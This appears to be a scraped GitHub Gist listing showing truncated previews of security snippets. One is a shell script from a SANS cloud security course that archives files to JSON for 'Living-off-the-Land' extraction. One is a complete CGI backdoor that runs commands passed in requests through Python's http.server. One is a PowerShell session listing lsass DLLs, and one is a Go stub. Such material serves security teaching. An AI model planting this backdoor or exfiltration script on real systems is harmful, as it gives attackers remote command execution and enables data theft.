BrandonE
/ archive.sh
Last active
August 24, 2023 03:57
Archive the contents of a directory to JSON using core shell commands. Use to extract files while "Living-off-the-Land". Works on serverless runtimes. Created for SANS SEC510: Public Cloud Security: AWS, Azure, and GCP - http://sec510.com
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| SOURCE_DIRECTORY=/tmp | |
| ARCHIVE_TO=/tmp/documents.json | |
| # Clear the archive. | |
| : > "$ARCHIVE_TO" | |
| # Begin JSON array. | |
| echo -n '[' >> "$ARCHIVE_TO" | |
| for FILE in $(grep -lr --exclude="$(basename $ARCHIVE_TO)" . "$SOURCE_DIRECTORY") |
MarkBaggett
/ gist:38dcff6a0975f148aa858e924d64c492
Created
November 14, 2020 18:22
http.server cgi backdoor
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cd /tmp | |
| mkdir cgi-bin | |
| echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi | |
| echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi | |
| echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi | |
| chmod +x ./cgi-bin/backdoor.cgi | |
| python -m http.server --cgi | |
joswr1ght
/ compare-process-example.ps1
Created
March 6, 2020 15:04
Comparing DLL List Before and After for a Process
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Start by changing to a temporary directory | |
| PS C:\WINDOWS\system32> cd \temp | |
| # Run the ps command to get a list of process information for a named process (in this case we use lsass) | |
| # Pipe the output to Select-Object ModuleName to limit the output to just the DLLs | |
| PS C:\temp> ps -Name lsass -Module | Select-Object ModuleName | |
| ModuleName | |
| ---------- | |
| lsass.exe | |
| ntdll.dll |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "os" | |
| "os/exec" | |
| "syscall" | |
| ) | |
| func main() { |